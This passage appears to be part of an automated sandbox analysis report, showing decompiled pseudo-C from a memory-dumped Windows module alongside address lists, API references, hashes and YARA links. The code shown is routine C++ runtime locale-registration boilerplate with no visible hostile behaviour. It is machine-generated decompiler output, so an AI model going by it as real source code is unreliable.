																																											 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																																											 *0x6e286dd0 = _t565;
																																											goto L89;
																																										}
																																									} else {
																																										_t565 = _t579;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t564 =  *(_t594 - 0x10);
																																								 *(_t594 - 0x10) = _t564;
																																								 *(_t594 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t564);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																																								 *0x6e286e00 = _t564;
																																								goto L82;
																																							}
																																						} else {
																																							_t564 = _t578;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t563 =  *(_t594 - 0x10);
																																					 *(_t594 - 0x10) = _t563;
																																					 *(_t594 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t563);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																																					 *0x6e286dcc = _t563;
																																					goto L75;
																																				}
																																			} else {
																																				_t563 = _t577;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t562 =  *(_t594 - 0x10);
																																		 *(_t594 - 0x10) = _t562;
																																		 *(_t594 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t562);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
																																		 *0x6e286dfc = _t562;
																																		goto L68;
																																	}
																																} else {
																																	_t562 = _t576;
																																	goto L68;
																																}
																															}
																														} else {
																															_t561 =  *(_t594 - 0x10);
																															 *(_t594 - 0x10) = _t561;
																															 *(_t594 - 4) = 1;
																															E6E1C6FD3(__eflags, _t561);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
																															 *0x6e286de0 = _t561;
																															goto L61;
																														}
																													} else {
																														_t561 = _t575;
																														goto L61;
																													}
																												}
																											} else {
																												_t560 =  *(_t594 - 0x10);
																												 *(_t594 - 0x10) = _t560;
																												 *(_t594 - 4) = 1;
																												E6E1C6FD3(__eflags, _t560);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
																												 *0x6e286ddc = _t560;
																												goto L54;
																											}
																										} else {
																											_t560 = _t574;
																											goto L54;
																										}
																									}
																								} else {
																									_t559 =  *(_t594 - 0x10);
																									 *(_t594 - 0x10) = _t559;
																									 *(_t594 - 4) = 1;
																									E6E1C6FD3(__eflags, _t559);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 4))))();
																									 *0x6e286db0 = _t559;
																									goto L47;
																								}
																							} else {
																								_t559 = _t573;
																								goto L47;
																							}
																						}
																					} else {
																						_t558 =  *(_t594 - 0x10);
																						 *(_t594 - 0x10) = _t558;
																						 *(_t594 - 4) = 1;
																						E6E1C6FD3(__eflags, _t558);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t558 + 4))))();
																						 *0x6e286dd8 = _t558;
																						goto L40;
																					}
																				} else {
																					_t558 = _t572;
																					goto L40;
																				}
																			}
																		} else {
																			_t557 =  *(_t594 - 0x10);
																			 *(_t594 - 0x10) = _t557;
																			 *(_t594 - 4) = 1;
																			E6E1C6FD3(__eflags, _t557);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t557 + 4))))();
																			 *0x6e286dc4 = _t557;
																			goto L33;
																		}
																	} else {
																		_t557 = _t571;
																		goto L33;
																	}
																}
															} else {
																_t556 =  *(_t594 - 0x10);
																 *(_t594 - 0x10) = _t556;
																 *(_t594 - 4) = 1;
																E6E1C6FD3(__eflags, _t556);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t556 + 4))))();
																 *0x6e286dc8 = _t556;
																goto L26;
															}
														} else {
															_t556 = _t570;
															goto L26;
														}
													}
												} else {
													_t555 =  *(_t594 - 0x10);
													 *(_t594 - 0x10) = _t555;
													 *(_t594 - 4) = 1;
													E6E1C6FD3(__eflags, _t555);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t555 + 4))))();
													 *0x6e286df4 = _t555;
													goto L19;
												}
											} else {
												_t555 = _t569;
												goto L19;
											}
										}
									} else {
										_t554 =  *(_t594 - 0x10);
										 *(_t594 - 0x10) = _t554;
										 *(_t594 - 4) = 1;
										E6E1C6FD3(__eflags, _t554);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t554 + 4))))();
										 *0x6e286df8 = _t554;
										goto L12;
									}
								} else {
									_t554 = _t568;
									goto L12;
								}
							}
						} else {
							_t553 =  *(_t594 - 0x10);
							 *(_t594 - 0x10) = _t553;
							 *(_t594 - 4) = 1;
							E6E1C6FD3(__eflags, _t553);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t553 + 4))))();
							 *0x6e286dc0 = _t553;
							goto L5;
						}
					} else {
						_t553 = _t567;
						goto L5;
					}
				}
			}

0x6e1cf4c1
0x6e1cf4c1
0x6e1cf4c8
0x6e1cf4d2
0x6e1cf4d7
0x6e1cf4e2
0x6e1cf4e6
0x6e1cf4e9
0x6e1cf4ee
0x6e1cf4f2
0x6e1cf4f7
0x6e1cf4fb
0x6e1cf540
0x6e1cf543
0x6e1cf54f
0x6e1cf4fd
0x6e1cf4ff
0x6e1cf505
0x6e1cf50b
0x6e1cf513
0x6e1cf516
0x6e1cf553
0x6e1cf561
0x6e1cf566
0x6e1cf56e
0x6e1cf578
0x6e1cf57d
0x6e1cf588
0x6e1cf58c
0x6e1cf58f
0x6e1cf594
0x6e1cf59d
0x6e1cf59f
0x6e1cf5a1
0x6e1cf5e6
0x6e1cf5e9
0x6e1cf5f5
0x6e1cf5a3
0x6e1cf5a3
0x6e1cf5a5
0x6e1cf5ab
0x6e1cf5b1
0x6e1cf5b9
0x6e1cf5bc
0x6e1cf5f9
0x6e1cf607
0x6e1cf60c
0x6e1cf614
0x6e1cf61e
0x6e1cf623
0x6e1cf62e
0x6e1cf632
0x6e1cf635
0x6e1cf63a
0x6e1cf643
0x6e1cf645
0x6e1cf647
0x6e1cf68c
0x6e1cf68f
0x6e1cf69b
0x6e1cf649
0x6e1cf649
0x6e1cf64b
0x6e1cf651
0x6e1cf657
0x6e1cf65f
0x6e1cf662
0x6e1cf69f
0x6e1cf6ad
0x6e1cf6b2
0x6e1cf6ba
0x6e1cf6c4
0x6e1cf6c9
0x6e1cf6d4
0x6e1cf6d8
0x6e1cf6db
0x6e1cf6e0
0x6e1cf6e9
0x6e1cf6eb
0x6e1cf6ed
0x6e1cf732
0x6e1cf735
0x6e1cf741
0x6e1cf6ef
0x6e1cf6ef
0x6e1cf6f1
0x6e1cf6f7
0x6e1cf6fd
0x6e1cf705
0x6e1cf708
0x6e1cf745
0x6e1cf753
0x6e1cf758
0x6e1cf760
0x6e1cf76a
0x6e1cf76f
0x6e1cf77a
0x6e1cf77e
0x6e1cf781
0x6e1cf786
0x6e1cf78f
0x6e1cf791
0x6e1cf793
0x6e1cf7d8
0x6e1cf7db
0x6e1cf7e7
0x6e1cf795
0x6e1cf795
0x6e1cf797
0x6e1cf79d
0x6e1cf7a3
0x6e1cf7ab
0x6e1cf7ae
0x6e1cf7eb
0x6e1cf7f9
0x6e1cf7fe
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf835
0x6e1cf837
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797
0x6e1cf70a
0x6e1cf70a
0x6e1cf70d
0x6e1cf711
0x6e1cf715
0x6e1cf722
0x6e1cf72a
0x6e1cf72c
0x00000000
0x6e1cf72c
0x6e1cf6f3
0x6e1cf6f3
0x00000000
0x6e1cf6f3
0x6e1cf6f1
0x6e1cf664
0x6e1cf664
0x6e1cf667
0x6e1cf66b
0x6e1cf66f
0x6e1cf67c
0x6e1cf684
0x6e1cf686
0x00000000
0x6e1cf686
0x6e1cf64d
0x6e1cf64d
0x00000000
0x6e1cf64d
0x6e1cf64b
0x6e1cf5be
0x6e1cf5be
0x6e1cf5c1
0x6e1cf5c5
0x6e1cf5c9
0x6e1cf5d6
0x6e1cf5de
0x6e1cf5e0
0x00000000
0x6e1cf5e0
0x6e1cf5a7
0x6e1cf5a7
0x00000000
0x6e1cf5a7
0x6e1cf5a5
0x6e1cf518
0x6e1cf518
0x6e1cf51b
0x6e1cf51f
0x6e1cf523
0x6e1cf530
0x6e1cf538
0x6e1cf53a
0x00000000
0x6e1cf53a
0x6e1cf501
0x6e1cf501
0x00000000
0x6e1cf501
0x6e1cf4ff

APIs

__EH_prolog3.LIBCMT ref: 6E1CF4C8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF4D2
int.LIBCPMT ref: 6E1CF4E9

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF523
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF543
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF561

Strings

tm(n, xrefs: 6E1CF4DD

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: tm(n
API String ID: 651022567-1916883537
Opcode ID: 9be10ebee0f8dd41ef4f34f27206de808e436bb0462bf580a731567ab719fd56
Instruction ID: a623e47812fada3c68ea31d63167a888b1411e1e5eb347ca1a416cca47a24bb8
Opcode Fuzzy Hash: 9be10ebee0f8dd41ef4f34f27206de808e436bb0462bf580a731567ab719fd56
Instruction Fuzzy Hash: 0F110AB591051D8BCF01EFD4C854AFEB77ABF64B14F240908D520E7290DF789988E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DBB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6E1DBB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t110 - 0x14, 0);
				_t105 =  *0x6e286e40; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1A161C(0x6e286e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1A171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E1C66BA(_t110 - 0x14);
					return E6E1E0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E1DC229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t110 - 0x20);
							E6E1E3D74(_t110 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t102, _t105, 0x14);
							E6E1C6653(_t110 - 0x14, 0);
							_t106 =  *0x6e286e44; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1A161C(0x6e286e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1A171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E1C66BA(_t110 - 0x14);
								return E6E1E0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E1DC295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1A1438(_t93);
										E6E1E3D74(_t110 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e22851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e22c414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E1DD028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E1E0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E1C6FD3(__eflags, _t103);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e286e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E1C6FD3(__eflags, _t102);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e286e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

0x6e1dbb30
0x6e1dbb37
0x6e1dbb41
0x6e1dbb46
0x6e1dbb51
0x6e1dbb55
0x6e1dbb58
0x6e1dbb5d
0x6e1dbb61
0x6e1dbb66
0x6e1dbb6a
0x6e1dbbaf
0x6e1dbbb2
0x6e1dbbbe
0x6e1dbb6c
0x6e1dbb6e
0x6e1dbb74
0x6e1dbb7a
0x6e1dbb82
0x6e1dbb85
0x6e1dbbc2
0x6e1dbbd0
0x6e1dbbd5
0x6e1dbbdd
0x6e1dbbe7
0x6e1dbbec
0x6e1dbbf7
0x6e1dbbfb
0x6e1dbbfe
0x6e1dbc03
0x6e1dbc0c
0x6e1dbc0e
0x6e1dbc10
0x6e1dbc55
0x6e1dbc58
0x6e1dbc64
0x6e1dbc12
0x6e1dbc12
0x6e1dbc14
0x6e1dbc1a
0x6e1dbc20
0x6e1dbc28
0x6e1dbc2b
0x6e1dbc65
0x6e1dbc68
0x6e1dbc76
0x6e1dbc7b
0x6e1dbc83
0x6e1dbc88
0x6e1dbc8a
0x6e1dbc90
0x6e1dbc93
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbca0
0x6e1dbca6
0x6e1dbca9
0x6e1dbcb5
0x6e1dbc2d
0x6e1dbc2d
0x6e1dbc30
0x6e1dbc34
0x6e1dbc38
0x6e1dbc45
0x6e1dbc4d
0x6e1dbc4f
0x00000000
0x6e1dbc4f
0x6e1dbc16
0x6e1dbc16
0x00000000
0x6e1dbc16
0x6e1dbc14
0x6e1dbb87
0x6e1dbb87
0x6e1dbb8a
0x6e1dbb8e
0x6e1dbb92
0x6e1dbb9f
0x6e1dbba7
0x6e1dbba9
0x00000000
0x6e1dbba9
0x6e1dbb70
0x6e1dbb70
0x00000000
0x6e1dbb70
0x6e1dbb6e

APIs

__EH_prolog3.LIBCMT ref: 6E1DBB37
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DBB41
int.LIBCPMT ref: 6E1DBB58

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DBB92
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBBB2
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBBD0

Strings

n(n, xrefs: 6E1DBB4C

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: n(n
API String ID: 651022567-879260925
Opcode ID: f282964f77630d8673d8503a03abd34e9dcbc59e8e755387b7e3726fced1a1b9
Instruction ID: d32b9b098d6a86a3a02ef855666e18e5029482bf4c89756e12b723f6b8355137
Opcode Fuzzy Hash: f282964f77630d8673d8503a03abd34e9dcbc59e8e755387b7e3726fced1a1b9
Instruction Fuzzy Hash: 69112075D106288BCF01EBE4C854EFEB77ABF94714F140908E020AB290DFB49A88E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF375(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;

				_t633 = __edx;
				_t482 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t682 - 0x14, 0);
				_t651 =  *0x6e286dbc; // 0x0
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6E1A161C(0x6e286d70);
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6E1C66BA(_t682 - 0x14);
					return E6E1E0075(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6E1D0FEF(__ebx, _t485, __edx, _t635, _t651) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t682 - 0x20);
							E6E1E3D74(_t682 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t635, _t651, 0x14);
							E6E1C6653(_t682 - 0x14, 0);
							_t652 =  *0x6e286df0; // 0x0
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6E1A161C(0x6e286d9c);
							_t492 =  *((intOrPtr*)(_t682 + 8));
							_t636 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6E1C66BA(_t682 - 0x14);
								return E6E1E0075(_t636);
							} else {
								__eflags = _t652;
								if(_t652 == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6E1D1057(_t482, _t492, __edx, _t636, _t652) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t682 - 0x20);
										E6E1E3D74(_t682 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t482, _t636, _t652, 0x14);
										E6E1C6653(_t682 - 0x14, 0);
										_t653 =  *0x6e286dc0; // 0x0
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6E1A161C(0x6e286d74);
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6E1C66BA(_t682 - 0x14);
											return E6E1E0075(_t637);
										} else {
											__eflags = _t653;
											if(_t653 == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
												_push(_t682 - 0x10);
												__eflags = E6E1D10BF(_t482, _t499, __edx, _t637, _t653) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t682 - 0x20);
													E6E1E3D74(_t682 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t482, _t637, _t653, 0x14);
													E6E1C6653(_t682 - 0x14, 0);
													_t654 =  *0x6e286df8; // 0x0
													 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
													 *(_t682 - 0x10) = _t654;
													_t262 = E6E1A161C(0x6e286da4);
													_t506 =  *((intOrPtr*)(_t682 + 8));
													_t638 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t262);
													__eflags = _t638;
													if(_t638 != 0) {
														L26:
														E6E1C66BA(_t682 - 0x14);
														return E6E1E0075(_t638);
													} else {
														__eflags = _t654;
														if(_t654 == 0) {
															_push( *((intOrPtr*)(_t682 + 8)));
															_push(_t682 - 0x10);
															__eflags = E6E1D1127(_t482, _t506, _t633, _t638, _t654) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t682 - 0x20);
																E6E1E3D74(_t682 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t482, _t638, _t654, 0x14);
																E6E1C6653(_t682 - 0x14, 0);
																_t655 =  *0x6e286df4; // 0x0
																 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																 *(_t682 - 0x10) = _t655;
																_t275 = E6E1A161C(0x6e286da0);
																_t513 =  *((intOrPtr*)(_t682 + 8));
																_t639 = E6E1A171B( *((intOrPtr*)(_t682 + 8)), _t275);
																__eflags = _t639;
																if(_t639 != 0) {
																	L33:
																	E6E1C66BA(_t682 - 0x14);
																	return E6E1E0075(_t639);
																} else {
																	__eflags = _t655;
																	if(_t655 == 0) {
																		_push( *((intOrPtr*)(_t682 + 8)));
																		_push(_t682 - 0x10);
																		__eflags = E6E1D11AB(_t482, _t513, _t633, _t639, _t655) - 0xffffffff;
